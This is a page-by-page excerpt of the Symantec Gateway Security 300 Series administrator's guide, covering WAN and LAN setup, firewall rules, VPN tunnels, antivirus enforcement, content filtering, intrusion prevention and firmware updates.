Page 1 Symantec™ Gateway Security 300 Series Administrator’s Guide Supported models: Models 320, 360, and 360R...
Page 2: Technical Support
Corporation. NO WARRANTY. The technical documentation is being delivered to you AS-IS and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the technical documentation or the information contained therein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical errors.
Page 3: Contacting Technical Support
24 hours a day, 7 days a week worldwide in a variety of languages for those customers enrolled in the Platinum Support program Advanced features, such as the Symantec Alerting Service and Technical ■ Account Manager role, offer enhanced response and proactive security support Please visit our Web site for current information on Support Programs.
Page 4: Customer Service
General product information (features, language availability, local dealers) ■ Latest information on product updates and upgrades ■ Information on upgrade insurance and maintenance contracts ■ Information on Symantec Value License Program ■ Advice on Symantec’s technical support options ■ Nontechnical presales questions ■...
Page 5: Table Of Contents
Contents Chapter 1 Introducing the Symantec Gateway Security 300 Series Intended audience ....................12 Where to get more information ................. 12 Chapter 2 Administering the security gateway Accessing the Security Gateway Management Interface ......13 Using the SGMI .................... 15 Managing administrative access ...............
Page 6 6 Contents Load balancing ..................... 51 SMTP binding ....................52 Binding to other protocols ................. 52 Failover ......................52 DNS gateway ....................53 Optional network settings ................54 Chapter 4 Configuring internal connections Configuring LAN IP settings ................57 Configuring the appliance as DHCP server ............. 58 Monitoring DHCP usage ................
Page 7 Contents Understanding Gateway-to-Gateway tunnels ......... 88 Configuring dynamic Gateway-to-Gateway tunnels ......91 Configuring static Gateway-to-Gateway tunnels ........93 Sharing information with the remote gateway administrator ..... 96 Configuring Client-to-Gateway VPN tunnels ..........96 Understanding Client-to-Gateway VPN tunnels ........97 Defining client VPN tunnels ..............99 Setting global policy settings for Client-to-Gateway VPN tunnels ....................101 Sharing information with your clients ...........101...
Page 8 About troubleshooting ..................141 Accessing troubleshooting information ............143 Appendix B Licensing Session licensing for Symantec Gateway Security 300 Series Client-to-Gateway VPN functions ..............145 Additive session licenses ................145 SYMANTEC GATEWAY SECURITY APPLIANCE LICENSE AND WARRANTY AGREEMENT ................146...
Page 9 Contents Firewall field descriptions ................176 Computers tab field descriptions ............177 Computer Groups tab field descriptions ..........179 Inbound Rules field descriptions .............180 Outbound Rules tab field descriptions ...........181 Services tab field descriptions ..............182 Special Application tab field descriptions ..........183 Advanced tab field descriptions ..............186 VPN field descriptions ..................187 Dynamic Tunnels tab field descriptions ..........189 Static Tunnels tab field descriptions ............193...
Page 10 10 Contents...
Page 11: Introducing The Symantec Gateway Security 300 Series
■ All features are designed specifically for the small business. These appliances are perfect for stand-alone environments or as a complement to Symantec Gateway Security 5400 Series appliances deployed at hub sites. All of the Symantec Gateway Security 300 Series models are wireless-capable.
Page 12: Intended Audience
802.11 transceiver and antenna, to allow the highest possible integrated security for wireless LANs, when used with clients running the Symantec Client VPN software. LiveUpdate of firmware strengthens the Symantec Gateway Security 300 Series security response, making it a perfect solution for small businesses.
Page 13: Administering The Security Gateway
Security Gateway Management Interface (SGMI). The SGMI is a standalone management console for locale management and log viewing. This guide describes how to use the SGMI to manage Symantec Gateway Security 300 Series appliances. The SGMI is a browser-based console where you can create configurations, view status, and access logs.
Page 14 Command buttons Right pane content Note: The wireless features do not appear in the SGMI until a compatible Symantec Gateway Security WLAN Access Point option is properly installed. See the Symantec Gateway Security 300 Series Wireless Implementation Guide for more information.
Page 15: Using The Sgmi
Administering the security gateway Managing administrative access The interface you see when you connect to the SGMI may vary slightly depending on the model you are managing. Table 2-1 describes the ports on each model. Table 2-1 Interfaces by model Model Number of WAN Number of LAN...
Page 16: Setting The Administration Password
SGMI to people who have been given the password. You must have installed the appliance and connected your browser to the SGMI to set the password. See the Symantec Gateway Security 300 Series Installation Guide for more information about setting up the appliance.
Page 17: Configuring Remote Management
Administering the security gateway Managing administrative access To manually reset the password On the back of the appliance, press the reset button for 10 seconds. Repeat the configure a password procedure. See “To manually reset the password” on page 17. Configuring remote management You can access the SGMI remotely from the WAN side using a computer with an IP address that is within configured range of IP addresses.
Page 18 Figure 2-2 Remote management SGMI Internet Symantec Gateway Security 300 Series appliance Protected devices To configure remote management, specify both a start and end IP address. If you only want to remotely manage from only one IP address, type it as both the start and end IP address.
Page 19: Managing The Security Gateway Using The Serial Console
Administering the security gateway Managing the security gateway using the serial console In the End IP Address text boxes, type the last IP Address (highest in the range). To permit only one IP address, type the same value in both text boxes. To enable remote Trivial File Transfer Protocol (TFTP) upgrades to the appliance’s firmware from the configured IP address range, check Allow Remote Firmware Upgrade.
Page 20 20 Administering the security gateway Managing the security gateway using the serial console In the terminal program, set the program to connect directly to the COM port on your computer to which the appliance is physically connected. Set the communication settings as follows: Baud (Bits per second) 9600 Data bits...
Page 21 Administering the security gateway Managing the security gateway using the serial console Start IP Address Type 4 to type the first IP address in the range that the DHCP server can allocate. Finish IP Address Type 5 to type the last IP address in the range that the DHCP server can allocate.
Page 22 22 Administering the security gateway Managing the security gateway using the serial console...
Page 23: Configuring A Connection To The Outside Network
See the Symantec Gateway Security 300 Series Installation Guide for worksheets to plan the configuration. Symantec Gateway Security 300 Series model 320 has one WAN port to configure. Models 360 and 360R appliances have two WAN ports that you can...
Page 24: Network Examples
Network examples Figure 3-1 shows a network diagram of a Symantec Gateway Security 300 Series that is connected to the Internet. The termination point represents any network termination type. This is a device that may be provided by your Internet Service Provider (ISP), or a network switch.
Page 25 Configuring a connection to the outside network Network examples Management Interface (SGMI). The protected network communicates through the Symantec Gateway Security 300 Series appliance to the Internet. Figure 3-1 Connection to the Internet Internet Termination point Symantec Gateway Security 300 Series...
Page 26 In this scenario, the appliance protects an enclave of the larger internal network from unauthorized internal users. Enclave traffic from the protected network passes through the Symantec Gateway Security 300 Series and through the Symantec Gateway Security 5400 Series to the Internet.
Page 27: Understanding The Setup Wizard
You can re-run the Setup Wizard at any time after the initial installation. To run the Setup Wizard, on the WAN/ISP > Main Setup window, click Run Setup Wizard. See the Symantec Gateway Security 300 Series Installation Guide for more information.
Page 28: Understanding Connection Types
28 Configuring a connection to the outside network Understanding connection types and whether it applies to both WAN ports or if you must configure each separately. Table 3-1 WAN port configurations Configuration Which WAN port? Connection types Configure a connection type for each WAN port. “Understanding connection types”...
Page 29 Configuring a connection to the outside network Understanding connection types Typical dial-up accounts are analog (through a normal phone line connected to an external modem) and ISDN (through a special phone line). Typical broadband accounts are broadband cable, DSL, T1/E1, or T3 connected to a terminal adaptor.
Page 30: Configuring Connectivity
30 Configuring a connection to the outside network Configuring connectivity Table 3-3 Broadband connection types (Continued) Connection type Services Network termination types Static IP (Static IP & Broadband cable Cable modem DNS) Digital Subscriber Line DSL modem (DSL) Channel Service Unit/Digital Service Unit (CSU/DSU) Direct Ethernet Ethernet cable (usually an enclave...
Page 31: Pppoe
Configuring a connection to the outside network Configuring connectivity To select DHCP as your connection type “Main Setup tab field descriptions” on page 164. In the SGMI, in the left pane, click WAN/ISP. For model 320, do the following: In the right pane, on the Main Setup tab, under Connection Type, click ■...
Page 32 32 Configuring a connection to the outside network Configuring connectivity By default, all settings are associated with Session 1. For multi-session PPPoE Accounts, configure each session individually. If you have multiple PPPoE accounts, assign each one to a different session in the SGMI. Before configuring the WAN ports to use a PPPoE account, gather the following information: User name and password...
Page 33 Configuring a connection to the outside network Configuring connectivity In the Idle Time-out text box, type the number of minutes of inactivity after which you want the appliance to disconnect from the PPPoE account. If you have a static IP PPPoE Internet account, in the Static IP Address text box, type the IP address.
Page 34: Static Ip And Dns
34 Configuring a connection to the outside network Configuring connectivity Connecting manually to your PPPoE account You can manually connect or disconnect from your PPPoE account. For model 360 or 360R, you can manually control the connection for either WAN port. This is useful to troubleshoot the connection to the ISP.
Page 35 In the right pane, on the Static IP & DNS tab, under WAN IP, in the IP ■ Address text boxes, type the desired IP address of the external (WAN) side of the Symantec Gateway Security 300 Series appliance. In the Network Mask text box, type the network mask. ■...
Page 36: Pptp
TCP/IP-based network. Symantec Gateway Security 300 Series appliances act as a PPTP access client (PAC) when you connect to a PPTP Network Server (PNS), generally with your ISP.
Page 37 Configuring a connection to the outside network Configuring connectivity For model 320, do the following: In the right pane, on the Main Setup tab, under Connection Type, click ■ PPTP. Click Save. ■ For model 360 or 360R, do the following: Under WAN1 (External), in the Connection Type drop-down list, click ■...
Page 38 38 Configuring a connection to the outside network Configuring connectivity For model 360 and 360R, do the following: In the right pane, on the PPTP tab, under WAN Port, in the WAN Port ■ drop-down list, select the WAN port to connect. Under Manual Control, click Connect.
Page 39: Dial-Up Accounts
320 appliance. Figure 3-3 Rear panel of Symantec Gateway Security model 320 appliance Serial port Figure 3-4 shows the serial port on the rear panel of the model 360 and 360R...
Page 40 40 Configuring a connection to the outside network Configuring connectivity Figure 3-4 Rear panel of Symantec Gateway Security model 360 and 360R appliances Serial port Before configuring the appliance to use your dial-up account as either the primary or backup connection, gather the following information and equipment: Account information User name, which may be different from your account name, and password for the dial-up account.
Page 41 Configuring a connection to the outside network Configuring connectivity To configure your primary dial-up account In the SGMI, in the left pane, click WAN/ISP. In the right pane, on the Main Setup tab, under Connection Type, click Analog/ISDN. Click Save. On the Dial-up Backup &...
Page 42 42 Configuring a connection to the outside network Configuring connectivity To enable the backup dial-up account In the SGMI, in the left pane, click WAN/ISP. On the Dial-up Backup and Analog/ISDN tab, under Backup Mode, do the following: Check Enable Backup Mode. ■...
Page 43: Configuring Advanced Connection Settings
ISP to allocate a new IP address to the appliance. You can tell the appliance at any time to request a new IP address, by forcing a DHCP renew. However, you should only do this if requested by Symantec Technical Support.
Page 44: Advanced Ppp Settings
44 Configuring a connection to the outside network Configuring advanced connection settings To configure advanced DHCP settings You can configure the idle renew time and manually force a DHCP renew request. “Advanced tab field descriptions” on page 175. To configure idle renew In the SGMI, in the left pane, click WAN/ISP.
Page 45: Maximum Transmission Unit (Mtu)
DHCP Idle Renew settings to their default values. Configuring dynamic DNS The Symantec Gateway Security 300 Series can use a dynamic DNS service to map dynamic IP addresses to a domain name to which users can connect.
Page 46 46 Configuring a connection to the outside network Configuring dynamic DNS When you create an account with TZO, they send you the following information to log in and use your account: key (password), email (user name), and domain. Gather this information before configuring the appliance to use TZO. For more information about TZO dynamic DNS, go to http://www.tzo.com.
Page 47: Forcing Dynamic Dns Updates
When you force a dynamic DNS update, the appliance sends its current IP address, host name, and domain to the service. Do this only if requested by Symantec Technical Support. For model 320, you can force a dynamic DNS update for the WAN port. For model 360 or 360R, you can force a dynamic DNS update for WAN1, WAN2, or both ports.
Page 48: Disabling Dynamic Dns
Click Save. Configuring routing If you install Symantec Gateway Security 300 Series appliances on a network with more than one directly connected router, you must specify to which router to send traffic. The appliance supports two types of routing: dynamic and static.
Page 49: Configuring Static Route Entries
Configuring a connection to the outside network Configuring routing To enable dynamic routing “Routing tab field descriptions” on page 174. In the SGMI, in the left pane, click WAN/ISP. On the Routing tab, under Dynamic Routing, check Enable RIP v2. Click Save.
Page 50: Configuring Advanced Wan/Isp Settings
50 Configuring a connection to the outside network Configuring advanced WAN/ISP settings To edit a route entry In the SGMI, in the left pane, click WAN/ISP. On the Routing tab, under Static Routes, in the Route Entry drop-down list, select a route entry. Under Static Routes, change information in any of the fields.
Page 51: Load Balancing
Click Save. Load balancing Symantec Gateway Security 300 Series model 360 and 360R appliances each have two WAN ports. On these appliances, you can configure high availability and load balancing (HA/LB) between the two WAN ports. You can set the percentage of packets that is sent over WAN1 or WAN2. You enter a percentage only for WAN1;...
Page 52: Smtp Binding
52 Configuring a connection to the outside network Configuring advanced WAN/ISP settings SMTP binding Use SMTP binding when you have two different Internet connections with different ISPs used over different WAN ports. It ensures that email sent by a client goes over the WAN port associated with your email server. If the SMTP server is on the same subnet as one of the WAN ports, the security gateway automatically binds the SMTP server to that WAN port, and you do not have to specify the bind information.
Page 53: Dns Gateway
Configuring a connection to the outside network Configuring advanced WAN/ISP settings If a line is physically disconnected, then the line is considered disconnected and the appliance attempts to route traffic to the serial port or the other WAN port. If the cable is not physically disconnected, the appliance performs line checking every few seconds to determine if a line is active.
Page 54: Optional Network Settings
Some ISPs authenticate by the physical (MAC) address of your Ethernet port. This is common with broadband cable (DHCP) services. You can clone your computer’s adapter address to connect to your ISP with the Symantec Gateway Security 300 Series. This is called MAC cloning or masking.
Page 55 Configuring a connection to the outside network Configuring advanced WAN/ISP settings In the right pane, on the Main Setup tab, under Optional Network ■ Settings, in the Host Name text box, type a host name. The host and domain names are case-sensitive. In the Domain Name text box, type domain name for the appliance.
Page 56 56 Configuring a connection to the outside network Configuring advanced WAN/ISP settings...
Page 57: Configuring Internal Connections
■ Configuring port assignments ■ LAN settings let you configure your Symantec Gateway Security 300 Series appliance to work in a new or existing internal network. Each appliance is assigned an IP address and netmask by default. You can change this IP address and netmask. This way, you can specify an IP address and netmask for the appliance that fits your existing network.
Page 58: Configuring The Appliance As Dhcp Server
58 Configuring internal connections Configuring the appliance as DHCP server network already uses 192.168.0.x, you can change the appliance’s IP address to 10.10.10.x, so you do not have to reconfigure your existing network. You can change the appliance’s IP address and netmask at any time. The default IP address is 192.168.0.1 and the default netmask is 255.255.255.0.
Page 59 Configuring internal connections Configuring the appliance as DHCP server the appliance, adjust the DHCP IP address range appropriately. See “To change the DHCP IP address range” on page 60. Table 4-1 shows the default start and end IP addresses for each model. The default range is based on the recommended number of concurrent clients for each model.
Page 60: Monitoring Dhcp Usage
VPN clients to connect to LAN resources. You can connect many network devices to the LAN ports: routers, switches, client machines, or other Symantec Gateway Security 300 Series appliances. For these options, select the Standard port assignment. If you are connecting a...
Page 61: Standard Port Assignment
Configuring internal connections Configuring port assignments Standard port assignment When LAN ports are designated as standard, the appliance acts as a typical switch: it forwards traffic based on MAC address and traffic does not reach the security gateway engine unless it was specifically designated for it. This option does not support client VPN tunnels terminating at the LAN.
Page 62 62 Configuring internal connections Configuring port assignments...
Page 63: Network Traffic Control
■ Configuring advanced options ■ The Symantec Gateway Security 300 Series appliance includes firewall technology that let you configure the firewall component to meet your security policy requirements. When configuring the firewall, identify all computers (nodes) to be protected on your network.
Page 64: Understanding Computers And Computer Groups
64 Network traffic control Understanding computers and computer groups What kinds of users will be protected by the security gateway? Will all users ■ have the same access and privileges? What types of services do you want to make available to internal users? ■...
Page 65: Defining Computer Group Membership
Network traffic control Understanding computers and computer groups Defining computer group membership Configuring computers is the first step in configuring the firewall component of the appliance. When creating your security policy, assign the largest group of hosts to the Everyone computer group to minimize the input and management of MAC addresses.
Page 66 66 Network traffic control Understanding computers and computer groups If the computer is an application server to which you want to allow access to an inbound rule, or to reserve an IP address for a computer that is not an application server, under Application Server, check Reserve Host.
Page 67: Defining Computer Groups
Network traffic control Understanding computers and computer groups Defining computer groups Computer groups are logical groups of network entities used for outbound rules. You must configure and bind all local hosts (nodes) to the computer group they are in by using the Computers tab. See “Defining computer group membership”...
Page 68: Defining Inbound Access
68 Network traffic control Defining inbound access Defining inbound access Inbound rules control the type of traffic flowing into application servers on your appliance-protected networks. The default state for inbound traffic is that all traffic is denied (automatically blocked) until you configure inbound rules for each kind of traffic you want to allow.
Page 69: Defining Outbound Access
Network traffic control Defining outbound access In the right pane, on the Inbound Rules tab, on the Rule drop-down list, select an existing inbound rule. Click Select. Make the changes to the inbound rules fields. Click Update. The configured rule is displayed in the Inbound Rules List. To delete an inbound rule In the left pane, click Firewall.
Page 70 70 Network traffic control Defining outbound access VPN PPTP ■ LiveUpdate ■ SESA Server ■ SESA Agent ■ RealAudio1 ■ RealAudio2 ■ RealAudio 3 ■ PCA TCP ■ PCA UDP ■ TFTP ■ SNMP ■ If you have services that are not on this list, or a service that does not use its default port, you can create your own custom services.
Page 71 Network traffic control Defining outbound access service. If computer group 1 has no rules, all outbound traffic is allowed by default. If Figure 5-1 shows a diagram of these examples. Figure 5-1 Outbound rules example Outbound rule Outbound rule Name: E_Mail_1 Name: FTP_2 Computer group: Computer group:...
Page 72: Configuring Services
72 Network traffic control Configuring services To update an existing outbound rule In the SGMI, in the left pane, click Firewall. In the right pane, on the Outbound Rules tab, under Computer Groups, on the Computer Group drop-down list, select an computer group. To see a list of rules for the selected computer group, click View.
Page 73: Redirecting Services
Network traffic control Configuring services port number. For protocols that use a single port number, the listen on port starting and ending port number is the same. Redirecting services You can also configure services to be redirected from the ports they would normally enter (Listen on Port) to another port (Redirect to Port).
Page 74: Configuring Special Applications
74 Network traffic control Configuring special applications In the Redirect to Port(s): End text box, type a port number. Click Add. To update an existing service In the SGMI, in the left pane, click Firewall. In the right pane, on the Services tab, on the Application drop-down list, select an existing service.
Page 75 Network traffic control Configuring special applications Port triggers can be used very quickly (milliseconds), but for only one computer at a time. The speed with which port triggers are used gives the illusion of allowing multiple computers having the same ports opened. Special Applications entries work best with applications that require low throughput.
Page 76: Configuring Advanced Options
Click Delete. Configuring advanced options The Symantec Gateway Security 300 Series has several advanced firewall options for special circumstances. Enabling the IDENT port Queries to the IDENT port (113) normally result in the host name and company name information being returned.
Page 77: Disabling Nat Mode
Exposed Host (DMZ) has problems connecting from behind the security gateway, use the None setting. The following list includes the supported IPsec types: 1 SPI ■ ADI - Assured Digital 2 SPI ■ Standard (Symantec, Cisco Pix, and Nortel Contivity) clients 2 SPI-C ■ Cisco Concentrator 30X0 Series clients...
Page 78: Configuring An Exposed Host
Other ■ Redcreek Ravlin None ■ Note: Only change the IPsec pass-thru setting if required to do so by Symantec Technical Support. To configure IPsec pass-thru settings “Advanced tab field descriptions” on page 186. In the SGMI, in the left pane, click Firewall.
Page 79: Managing Icmp Requests
Network traffic control Configuring advanced options Managing ICMP requests By default, the security gateway does not respond to external ICMP requests sent to the WAN ports. You can also configure the security gateway to block or allow ICMP requests on the WAN. LAN ICMP requests always respond. To manage ICMP requests “Advanced tab field descriptions”...
Page 80 80 Network traffic control Configuring advanced options...
Page 81: Establishing Secure Vpn Connections
Internet) to safely transport sensitive data. VPNs are used to allow a single user or remote network to access the protected resources of another network. Symantec Gateway Security 300 Series appliances support three types of VPN tunnels: Gateway-to-Gateway, Client-to-Gateway, and wireless Client-to- Gateway.
Page 82: About Using This Chapter
If you do not have significant network or IT experience or have never configured a security gateway (Symantec or otherwise), you should read the first half of each section before configuring the feature.
Page 83 You cannot change the transform proposal list on the appliance; however this information may be useful to give to the remote gateway administrator.Table 6-1 lists the order of the Symantec Gateway Security 300 IKE proposals. Table 6-1 IKE proposal order...
Page 84: Creating Custom Phase 2 Vpn Policies
84 Establishing secure VPN connections Creating security policies and then later associate them with multiple secure tunnels. You can select a pre- defined policy, or you can create your own using the VPN Policies tab. VPN policies group together common characteristics for tunnels, and allow rapid setup of additional tunnels with the same characteristics.
Page 85: Viewing Vpn Policies List
Establishing secure VPN connections Identifying users In the SA Lifetime text box, type the number of minutes you want the security association to stay alive before a rekey occurs. The VPN tunnel is temporarily interrupted when rekeys occur. In the Data Volume Limit text box, type the number of kilobytes of traffic to allow before a rekey occurs.
Page 86: Understanding User Types
86 Establishing secure VPN connections Identifying users Understanding user types Users authenticate directly with the security gateway when connecting through a VPN tunnel. Users are defined on the security gateway Client Users tab. Users with extended authentication are not defined on the security gateway; they are defined on a RADIUS authentication server.
Page 87 Establishing secure VPN connections Identifying users To configure users “Client Users tab field descriptions” on page 199. In the SGMI, in the left pane, click VPN. In the right pane, on the Client Users tab, under VPN User Identity, in the User Name text box, type the name of a new user.
Page 88: Viewing The User List
88 Establishing secure VPN connections Configuring Gateway-to-Gateway tunnels In the RADIUS Group Binding text box, type the name of the user’s ■ RADIUS group. The RADIUS group is assigned to the user on the RADIUS server. The RADIUS server must return the value that you type in the RADIUS Group Binding text box in the filterID attribute.
Page 89 ■ Symantec Gateway Security 300 Series security gateways support creating a VPN tunnel to up to five remote subnets behind Symantec Enterprise Firewall or Symantec Gateway Security 5400 Series appliances, but not to another Symantec Gateway Security 300 Series appliance or Symantec Firewall/VPN Appliance.
Page 90 90 Establishing secure VPN connections Configuring Gateway-to-Gateway tunnels If you have another (additional) subnet on the LAN side of the Symantec Gateway Security 300 Series security gateway, VPN client tunnels to the LAN side of the security gateway are not supported for computers on this separate subnet.
Page 91: Configuring Dynamic Gateway-To-Gateway Tunnels
Creating VPN tunnels to Symantec Gateway Security 5400 Series clusters To create a VPN tunnel to a Symantec Gateway Security 5400 Series appliance high-availability/load balancing cluster, define the VPN tunnel using the virtual IP address of the cluster. Tunnels between Symantec Gateway 300 Series and Symantec Gateway Security 5400 Series appliances are supported in high- availability only.
Page 92 92 Establishing secure VPN connections Configuring Gateway-to-Gateway tunnels succeed. If the key matches, then Security Parameter Index (SPI), authentication, and encryption keys are automatically generated and the tunnel is created. The security gateway usually re-keys (generates a new key) automatically at set intervals to ensure the continued integrity of the key. Configuration tasks for dynamic Gateway-to-Gateway tunnels Table 6-4...
Page 93: Configuring Static Gateway-To-Gateway Tunnels
Establishing secure VPN connections Configuring Gateway-to-Gateway tunnels On the VPN Policy drop-down list, select a VPN policy to which you want to bind to the tunnel. If you have a multi-session PPPoE ISP account, under Local Security Gateway, in the PPPoE Session drop-down list, select a PPPoE session to which you want to bind to the tunnel.
Page 94 94 Establishing secure VPN connections Configuring Gateway-to-Gateway tunnels you chose. For each method, a key length is shown for both ASCII characters and Hex characters. Table 6-5 defines encryption key lengths. Table 6-5 Encryption key lengths Method Key length in character bytes Key length in Hex 18 (0x + 16 hex digits) 3DES...
Page 95 10 In the Authentication Key text box, type the authentication key to match the chosen VPN policy. 11 Under Remote Security Gateway, in the Gateway Address text box, type the gateway address to be the gateway address of the Symantec Enterprise VPN.
Page 96: Sharing Information With The Remote Gateway Administrator
(Optional) Local phase 1 ID Configuring Client-to-Gateway VPN tunnels Client-to-Gateway VPN tunnels let remote users running the Symantec Client VPN software (or any IPsec-compliant VPN client software) to safely connect over the Internet to a network secured by a Symantec security gateway.
Page 97: Understanding Client-To-Gateway Vpn Tunnels
Symantec Gateway Security 300 Series supports Client-to-Gateway VPN tunnel configurations. A Client-to-Gateway configuration is created when a workstation, running Symantec Client VPN software, connects to the security gateway from either inside the protected network or from a remote location through the Internet.
Page 98 LAN IP screen. “Configuring LAN IP settings” on page 57. Symantec Client-to-Gateway VPN tunnels require a client ID and a shared key. You can also apply extended authentication using a RADIUS server to Client-to- Gateway VPN tunnels for additional authentication.
Page 99: Defining Client Vpn Tunnels
■ If you enable content filtering for remote WAN-side VPN clients, you must have DNS servers on the local LAN. In Symantec Client VPN version 8.0, you can define two different tunnels: one for WAN which uses the domain name, and one for LAN, which uses the IP address.
Page 100 11 To enable AVpe, under WAN Client Policy, do the following: Check Enable Antivirus Policy Enforcement. ■ To log a warning to the Symantec Gateway Security log that a user is ■ connecting that is not compliant with AVpe policy, click Warn Only.
Page 101: Setting Global Policy Settings For Client-To-Gateway Vpn Tunnels
Establishing secure VPN connections Configuring Client-to-Gateway VPN tunnels Setting global policy settings for Client-to-Gateway VPN tunnels Some settings are configurable at a global level for Client-to-Gateway VPN tunnels. These settings configure the Phase 1 ID type for all client VPN tunnels connecting to the security gateway.
Page 102: Monitoring Vpn Tunnel Status
102 Establishing secure VPN connections Monitoring VPN tunnel status Table 6-10 Information to give clients Information Value RADIUS user name (Optional) RADIUS shared secret (user with extended authentication) (Optional) Phase 1 ID (Optional) Monitoring VPN tunnel status The VPN Status window lets you view the status for each configured dynamic and static Gateway-to-Gateway VPN tunnel.
Page 103: Advanced Network Traffic Control
Managing content filtering lists ■ Monitoring content filtering ■ Advanced network traffic control features of the Symantec Gateway Security 300 Series appliance include antivirus policy enforcement (AVpe) and content filtering. AVpe lets you monitor client antivirus configurations and, if necessary, enforce...
Page 104: How Antivirus Policy Enforcement (Avpe) Works
AVpe monitors the AV configuration of supported Symantec connected policy masters and client workstations attempting to gain access to your corporate network. See the Symantec Gateway Security 300 Series Release Notes for the version of the product you are using to determine the supported AV products and how their configuration and usage differs from the following information.
Page 105: Before You Begin Configuring Avpe
Advanced network traffic control Before you begin configuring AVpe Clients who have been denied access can still connect to Symantec AntiVirus Corporate Edition or Symantec LiveUpdate servers to update their virus definitions. You determine whether to enforce antivirus compliance for local clients using computer groups.
Page 106: Configuring Avpe
LiveUpdate directly for their AV updates, decide which client to designate as the master. The master should always be turned on, have an active Symantec antivirus client, and have a connection to the Internet where it can download virus definition updates.
Page 107: Enabling Avpe
■ To check a client’s antivirus configuration to verify that a the correct version of a supported Symantec antivirus product is installed on the client’s workstation. To enable the appliance to validate whether a client is using the latest virus definitions, check Verify Latest Virus Definitions.
Page 108 108 Advanced network traffic control Configuring AVpe To enable AVpe After you have configured AVpe, you must enable it for each computer or VPN group. Note: Enabling AVpe for VPN groups is for WAN clients only. You enable AVpe for LAN VPN clients through Computer groups in the Firewall section. “Defining computer group membership”...
Page 109: Configuring The Antivirus Clients
When you uninstall the client software, the registry keys that are created by this procedure are also removed. Warning: Do not use this procedure for clients managed by a Symantec AntiVirus server. To configure the AV clients Install or configure each client’s supported Symantec antivirus product in unmanaged mode.
Page 110: Log Messages
On the View Log tab, click Refresh. Verifying AVpe operation After you have enabled AVpe, you can test its operation by disabling Symantec AntiVirus Corporate Edition in a client workstation and then attempting to connect to the local network. If antivirus policy enforcement is properly configured, in the absence of enabled Symantec antivirus software, all connection attempts should be blocked or warned.
Page 111: About Content Filtering
If this message is present, then your AVpe feature is correctly configured and operational. If you are able to connect to www.symantec.com, recheck your AVpe configuration settings and group assignments. Make sure that you uninstalled Symantec AntiVirus Corporate Edition from the client workstation, and that the client is a member of group with AVpe enabled, with connections blocked.
Page 112: Managing Content Filtering Lists
For wild card functionality, specify only the domain name in the allow or deny list for specific sites. For example, to allow traffic to any Symantec site, add symantec.com to the allow list. This allows traffic to liveupdate.symantec.com, www.symantec.com, fileshare.symantec.com, and so on.
Page 113: Enabling Content Filtering For Lan
Advanced network traffic control Managing content filtering lists In the Input URL text box, type the name of a site you want to add to the list. For example, yoursite.com or mysite.com/pictures/me.html. Click Add. Repeat the previous two steps until you have all your URLs added to the list. Click Save List.
Page 114: Monitoring Content Filtering
114 Advanced network traffic control Monitoring content filtering Monitoring content filtering Content filtering logs a message in the log files if packets are dropped due to a user attempting to access a URL on the deny list, or attempting to access a URL that is not specifically permitted on the allow list.
Page 115: Preventing Attacks
■ Enabling advanced protection settings ■ The Symantec Gateway Security 300 series appliance provides intrusion detection and prevention services (IDS and IPS). The IDS and IPS functions are enabled by default, and provide atomic packet protection. You may disable IDS and IPS functionality at any time.
Page 116: Trojan Horse Protection
116 Preventing attacks Setting protection preferences one attack in five seconds. When ICMP is enabled, the log messages are not limited. The appliance defends against the following atomic IDS/IPS signatures: Bonk ■ Back Orifice (Trojan horse communication channel) ■ Girlfriend (Trojan horse communication channel) ■...
Page 117: Enabling Advanced Protection Settings
Preventing attacks Enabling advanced protection settings Block/Don’t Warn ■ Drop the packet; but do not log. You can configure the following options for enabling and disabling IDS/IPS signature detection and logging: Select All to enable or disable detection of ALL signatures. ■...
Page 118: Tcp Flag Validation
Certain port mapping tools, such as NMAP, use invalid TCP flag combinations to detect a firewall on a network or map the security policy implemented on the firewall. Symantec Gateway Security 300 Series blocks and logs any traffic with illegal flag combinations for traffic that is not being denied by the security policy.
Page 119: Logging, Monitoring And Updates
Chapter Logging, monitoring and updates This chapter includes the following topics: Managing logging ■ Updating firmware ■ Backing up and restoring configurations ■ Interpreting LEDs ■ LiveUpdate and firmware upgrade LED sequences ■ The appliance provides configurable system logging features for viewing the system logs and monitoring system status.
Page 120: Configuring Log Preferences
120 Logging, monitoring and updates Managing logging Configuring log preferences Logging preferences let you set the way that you view log messages, the amount of logging that is performed, and how to handle when the log becomes full. The following settings help you create logging scenarios that are appropriate to your network’s needs: Emailing log messages ■...
Page 121 Serial WAN port (PPPoE or Analog) ■ WAN Link up (connected) ■ WAN Link down (disconnected) ■ A GET is a request from the SNMP server for status information from the Symantec Gateway Security 300 Series appliance. The appliance supports all...
Page 122 122 Logging, monitoring and updates Managing logging SNMP v1 MIBS (information variables) using GETs. A TRAP collects status information set from Symantec Gateway Security 300 Series appliance to the SNMP server. Configuring SNMP sets the IP addresses of the SNMP servers to receive status information (TRAPS) alerts from the SNMP agent running on the appliance.
Page 123 Logging, monitoring and updates Managing logging To verify SNMP communication Contact the SNMP server administrator and have them send a GET from the ◆ SNMP server to your appliance. The appliance responds by sending status information to the SNMP server. If it does not respond, check that the SNMP server IP address and community string are correct.
Page 124: Managing Log Messages
Non-destructive firmware updates the firmware but keeps the configurations intact. Symantec periodically releases updates to the firmware. There are three ways to update the firmware on your appliance: automatically using the Scheduler in...
Page 125: Automatically Updating Firmware
Updating firmware LiveUpdate, manually using LiveUpdate, or manually by receiving firmware from Symantec Technical Support and applying it using the symcftpw tool. By default, LiveUpdate checks for updates at the end of the Setup Wizard. You may disable this feature. See the Symantec Gateway Security 300 Series Installation Guide.
Page 126 LiveUpdate optional settings let you configure a connection to a LiveUpdate server through an HTTP proxy server. Use this feature only in the following situations: The appliance is located behind a Symantec Gateway Security appliance ■ using an HTTP proxy server.
Page 127 Symantec LiveUpdate Administration Utility. Rather than the appliance contacting the Symantec servers to obtain product updates, the appliance can contact the LiveUpdate server on the local network. This greatly reduces network traffic and increases transfer speeds. It also lets you stage, manage, and...
Page 128 128 Logging, monitoring and updates Updating firmware and instructions for installation are available on the Symantec Technical Support Web page http://www.symantec.com/techsupp/. Figure 9-1 shows several possible LiveUpdate configurations. Figure 9-1 LiveUpdate configurations Symantec LiveUpdate server Symantec Gateway Security 5400 Series...
Page 129: Upgrading Firmware Manually
Firmware upgrades are available from Symantec's Web site. If you do not configure LiveUpdate to automatically download and apply firmware upgrades, or if you are instructed to manually perform an upgrade by Symantec Technical Support, you should check the Symantec Web for the latest version of the firmware.
Page 130: Flashing The Firmware
